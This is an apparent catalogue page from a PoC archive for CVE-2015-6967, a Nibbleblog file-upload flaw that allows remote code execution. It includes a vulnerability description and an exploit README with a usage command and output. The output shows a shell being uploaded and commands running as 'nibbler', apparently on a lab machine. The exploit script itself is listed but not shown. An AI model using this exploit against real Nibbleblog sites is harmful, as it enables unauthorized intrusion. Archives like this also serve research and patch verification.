Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2015-6967 PoC — Nibbleblog 代码注入漏洞

Source
Associated Vulnerability
Title:Nibbleblog 代码注入漏洞 (CVE-2015-6967)
Description:NibbleBlog是一套博客引擎。 Nibbleblog 4.0.5之前版本的My Image插件中存在任意文件上传漏洞。远程攻击者可通过上传可执行文件,并发送直接的请求访问该文件利用该漏洞执行任意代码。
Description
An exploit for the Nibbles manager version 4.0.3. This exploit allows RCE to be performed.
Readme
# CVE-2015-6967
An exploit for the Nibbles manager version 4.0.3. This exploit allows RCE to be performed.
# Requirements
optparse, signal, requests
# Usage
```shell
python3 CVE-2015-6967.py --url http://10.129.156.150/ --username admin --password nibbles
[ + ] Login Succesfuly!
[+] Uploading shell...
[ * ] Shell has been uploaded!
---------------------------------------------------------------------------
cmd> whoami
nibbler
```
File Snapshot

[4.0K] /data/pocs/2bce4c05d20331ae1659609af8ffa9de35bef44c ├── [3.3K] CVE-2015-6967.py └── [ 434] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.